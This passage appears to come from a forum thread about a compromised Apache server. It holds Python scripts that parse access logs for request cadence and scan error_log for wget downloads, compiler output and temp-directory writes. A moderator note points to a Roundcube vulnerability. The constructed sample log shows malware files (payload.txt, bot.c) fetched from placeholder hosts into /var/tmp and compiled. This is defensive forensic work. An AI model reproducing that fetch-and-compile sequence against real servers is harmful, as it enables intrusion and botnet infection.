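ENTRY = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def sample_lines():
    """Constructed sample: one client polling about every 50 s, one bursting."""
    fmt = ('{ip} - - [30/Dec/2008:04:{m:02d}:{s:02d} -0500] '
           '"GET /webmail/process.php?refr=true&folder=inbox HTTP/1.1" 302 5 "-" "-"')
    poll = [(1, 12), (2, 3), (2, 53), (3, 44), (4, 34), (5, 25)]
    burst = [(10, 0), (10, 0), (10, 1), (10, 1), (10, 2), (10, 2)]
    lines = [fmt.format(ip="198.51.100.7", m=m, s=s) for m, s in poll]
    lines += [fmt.format(ip="203.0.113.9", m=m, s=s) for m, s in burst]
    return lines


def parse(lines):
    """Yield (client, timestamp, path without query string, status)."""
    for line in lines:
        m = ENTRY.match(line)
        if not m:
            continue  # malformed or wrapped entry: skip rather than guess
        ip, ts, _method, uri, status, _size = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        yield ip, when, uri.split("?", 1)[0], int(status)


def cadence(lines, path):
    """Per client: (request count, mean gap, gap jitter) in seconds for one path."""
    stamps = {}
    for ip, when, req_path, _status in parse(lines):
        if req_path == path:
            stamps.setdefault(ip, []).append(when)
    report = {}
    for ip, times in stamps.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if gaps:
            report[ip] = (len(times), mean(gaps), pstdev(gaps))
    return report


def classify(count, mean_gap, jitter, min_hits=5):
    """Assumed thresholds: steady gaps of 10 s or more vs. sub-2 s bursts."""
    if count >= min_hits and mean_gap >= 10 and jitter <= 2:
        return "fixed-interval polling"
    if count >= min_hits and mean_gap < 2:
        return "burst"
    return "irregular"


if __name__ == "__main__":
    for ip, stats in cadence(sample_lines(), "/webmail/process.php").items():
        print(ip, stats, classify(*stats))
```
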
 
For some reason your post was moderated by automatic software built into the forum. I just noticed it and approved it.

Generally I'd look first at Joomla if the problem appeared first on the server hosting Joomla, or if all the servers have Joomla installed.

In your case, since the error log where the problem is showing up is the main error log, I'd check all pages running from /var/www/html.

I believe I read in the past few days of one of the webmail systems (one I don't use) having a problem.

edit: Roundcube. Thread closed because it's been moved to the Roundcube vulnerability thread, here.

Good luck. Please keep us updated in that thread.

Jeff
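
An added example, not part of the thread and not either poster's code: stderr from commands spawned by the web server lands in Apache's main error_log without the usual `[date] [level]` prefix, so wget transcripts and compiler messages there can be pulled out mechanically, including fetch headers that appear mid-line when two downloads interleave. The sample log is constructed with placeholder hosts and file names, and the function names and the temp-directory list are assumptions.

```python
import re

# Constructed sample modelled on the error_log excerpt in the first post.
# Hosts, paths and file names are placeholders, not values from the thread.
SAMPLE = """\
[Tue Dec 30 00:11:02 2008] [notice] Accept mutex: sysvsem (Default: sysvsem)
--07:28:29-- http://203.0.113.10/~user/payload.txt
=> `/var/tmp/p.txt'
Connecting to 203.0.113.10:80... connected.
07:28:29 (44.90 MB/s) - `/var/tmp/p.txt' saved [565/565]
--09:09:00-- http://bad.example/.x/bot.c
HTTP request sent, awaiting response... --09:09:00-- http://bad.example/.x/bot.c
09:09:00 (154.59 KB/s) - `bot.c' saved [39952/39952]
bot.c:170: warning: conflicting types for built-in function 'pow'
gcc: bot.c: No such file or directory
[Tue Dec 30 09:30:00 2008] [error] File does not exist: /var/www/html/favicon.ico
"""

APACHE_ENTRY = re.compile(r"^\[\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}\] \[\w+\]")
# Not anchored: interleaved writers can put a wget header in the middle of a line.
WGET_FETCH = re.compile(r"--(\d\d:\d\d:\d\d)--\s+(\S+)")
WGET_SAVED = re.compile(r"^(\d\d:\d\d:\d\d) \([^)]*\) - `([^']+)' saved \[(\d+)/\d+\]")
COMPILER = re.compile(r"^(?:gcc|cc): |^[\w./-]+\.c(?::\d+)?: ")
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed world-writable locations


def scan_error_log(text):
    """Collect traces of spawned commands from lines Apache did not format itself."""
    found = {"fetches": [], "saved": [], "compiler": [], "unprefixed": 0}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or APACHE_ENTRY.match(line):
            continue
        found["unprefixed"] += 1
        for m in WGET_FETCH.finditer(line):
            found["fetches"].append((m.group(1), m.group(2)))
        saved = WGET_SAVED.match(line)
        if saved:
            found["saved"].append((saved.group(1), saved.group(2), int(saved.group(3))))
        elif COMPILER.match(line):
            found["compiler"].append(line)
    return found


def distinct_urls(found):
    """Unique download URLs, for blocking at the egress firewall or proxy."""
    return sorted({url for _time, url in found["fetches"]})


def temp_dir_writes(found):
    """Saved files that landed in a world-writable temp directory."""
    return [path for _time, path, _size in found["saved"] if path.startswith(TEMP_DIRS)]


if __name__ == "__main__":
    result = scan_error_log(SAMPLE)
    print("unprefixed lines:", result["unprefixed"])
    print("download URLs:", distinct_urls(result))
    print("temp-dir writes:", temp_dir_writes(result))
    print("compiler output lines:", len(result["compiler"]))
```
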
 